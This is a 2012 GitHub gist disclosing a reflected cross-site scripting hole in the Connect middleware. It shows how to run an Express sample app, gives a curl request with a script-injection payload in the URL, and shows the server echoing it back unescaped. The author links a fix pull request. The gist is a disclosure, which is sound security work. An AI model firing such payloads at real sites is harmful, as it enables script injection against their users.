Skip to content

Instantly share code, notes, and snippets.

@s3u

s3u/gist:1794561

Created February 11, 2012 00:41
Show Gist options
  • Save s3u/1794561 to your computer and use it in GitHub Desktop.
Save s3u/1794561 to your computer and use it in GitHub Desktop.
Download ZIP
connect XSS hole
Raw
gistfile1.md

Run a sample app

git clone https://github.com/visionmedia/express.git
cd express
npm install
node examples/ejs/index.js

Then try this

curl -v -k "http://localhost:3000/no5_such3_file7.pl?\"><script>alert(73541);</script>"

The server returns

Cannot GET /no5_such3_file7.pl?"><script>alert(73541);</script>
@s3u
Copy link
Author

s3u commented Feb 14, 2012

Here is the pull request for connect - senchalabs/connect#473

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment